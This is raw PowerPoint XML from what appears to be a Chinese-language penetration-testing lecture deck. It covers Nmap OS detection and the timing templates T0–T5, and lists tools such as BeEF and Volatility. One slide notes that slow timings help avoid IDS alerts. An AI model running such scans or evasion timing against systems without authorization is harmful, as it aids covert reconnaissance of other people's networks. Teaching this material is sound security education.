              <a:rPr lang="en-US" altLang="zh-TW" sz="1100" b="1" dirty="0"/>
              <a:t> (The Browser Exploitation Framework)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1100" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1100" dirty="0"/>
              <a:t>用於攻擊 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1100" dirty="0"/>
              <a:t>Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1100" dirty="0"/>
              <a:t>瀏覽器的工具。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1100" b="1" dirty="0"/>
              <a:t>Radare2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1100" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1100" dirty="0"/>
              <a:t>開源的反編譯框架。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1100" b="1" dirty="0"/>
              <a:t>Volatility</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1100" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1100" dirty="0"/>
              <a:t>用於記憶體分析和取證的工具。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20248212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內容版面配置區 2"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="532015" y="497741"/>
            <a:ext cx="7564582" cy="5523440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2936121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85800" y="803851"/>
            <a:ext cx="5835252" cy="769441"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0"/>
              <a:t>nmap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0" smtClean="0"/>
              <a:t>-O </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0" smtClean="0"/>
              <a:t>192.168.56.1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="內容版面配置區 3"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1821642"/>
            <a:ext cx="4735036" cy="4051300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4688379"/>
            <a:ext cx="4419599" cy="2493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09917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nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="149186" y="2215302"/>
          <a:ext cx="4200525" cy="4104776"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="4200525">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2160549935"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="7086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100" dirty="0"/>
                        <a:t>nmap </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2100" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>-T1 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2100" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2100" dirty="0"/>
                        <a:t>-p21-25 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2100" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2100" dirty="0" smtClean="0"/>
                        <a:t>192.168.1.104</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2100" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2057767107"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="662940">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0"/>
                        <a:t>Nmap Insane (-T5) Scan</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>used for sending packets insanely fast and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>waits only </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" i="0" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>0.3 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>seconds</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> for the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>response.</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2778746718"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="525780">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0"/>
                        <a:t>Nmap Aggressive (-T4) Scan</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="900" dirty="0"/>
                        <a:t>手冊說如果網路環境穩定，參數建議調整為 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="900" dirty="0"/>
                        <a:t>-T4</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="900" dirty="0"/>
                        <a:t>。</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-TW" sz="900" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="900" dirty="0"/>
                        <a:t>-T4 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="900" dirty="0"/>
                        <a:t>禁止動態 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="900" dirty="0"/>
                        <a:t>TCP Port </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="900" dirty="0"/>
                        <a:t>掃描延遲超過 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="900" dirty="0"/>
                        <a:t>10 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="900" dirty="0" err="1"/>
                        <a:t>ms</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="900" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2461284794"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="340496">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>Nmap Normal (-T3) Scan:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>預設使用</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF0000"/>
                        </a:solidFill>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val="3890937157"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="617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Nmap Polite (-T2) Scan</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1200" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0"/>
                        <a:t>he time difference between the two packets sent is </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" smtClean="0"/>
                        <a:t>0.4 seconds.</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1902494562"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="617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Nmap Sneaky (-T1) Scan</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1200" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0"/>
                        <a:t>The time difference between the two packets sent is 15 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" smtClean="0"/>
                        <a:t>seconds.</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1027532989"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="617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Nmap Paranoid (-T0) Scan</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0"/>
                        <a:t>The time difference between the two packets sent is 5 minutes</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="545857159"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="圖片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect t="10657" b="14272"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="82756" y="86829"/>
            <a:ext cx="850106" cy="638175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="932862" y="96354"/>
            <a:ext cx="7979569" cy="61912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400" dirty="0"/>
              <a:t>NMAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>掃描技術</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>: Timing template</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="749235" y="6473595"/>
            <a:ext cx="7531229" cy="253916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1050" b="1" dirty="0"/>
              <a:t>推薦閱讀</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1050" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1050" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1050" b="1" dirty="0"/>
              <a:t>Nmap for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1050" b="1" dirty="0" err="1"/>
              <a:t>Pentester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1050" b="1" dirty="0"/>
              <a:t>: Timing Scan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1050" b="1" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1050" b="1" dirty="0"/>
              <a:t>https://www.hackingarticles.in/nmap-for-pentester-timing-scan/</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1050" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="102894" y="835450"/>
            <a:ext cx="8915400" cy="715581"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="214313" indent="-214313">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1350" dirty="0"/>
              <a:t>Timing template in the nmap is defined by –T&lt;0-5&gt; having -T0 as the slowest and –T5 as the fastest. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="214313" indent="-214313">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1350" dirty="0"/>
              <a:t>Timing template in Nmap is used to optimize and improve the quality and performance of the scan to get desired results.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="圖片 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4514850" y="3050447"/>
            <a:ext cx="3798182" cy="1150115"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="圖片 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4532754" y="4259585"/>
            <a:ext cx="3762375" cy="1145311"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4349711" y="1345533"/>
            <a:ext cx="4572000" cy="507831"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1350" dirty="0"/>
              <a:t>the packets sent to the target IP are sent by a maximum difference of 5 milliseconds or 0.005 seconds</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="圖片 10"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect r="22436" b="88088"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4514850" y="2715944"/>
            <a:ext cx="3169444" cy="234872"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="矩形 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="149186" y="1578661"/>
            <a:ext cx="1800493" cy="253916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1050" dirty="0"/>
              <a:t>數字越大代表掃描速度越快</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="矩形 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="239315" y="5450309"/>
            <a:ext cx="4572000" cy="253916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1050" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>-T0 ~ -T1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1050" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>是避免 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1050" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>IDS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1050" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>告警，但掃描速度頗慢，沒有特殊需求，不建議使用</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="投影片編號版面配置區 13"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D16C3A51-89D0-4E4D-AA61-5A30A561532A}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>42</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1953077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nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="130492" y="1790225"/>
          <a:ext cx="8636318" cy="2494280"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2920664">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2160549935"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="5715654">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
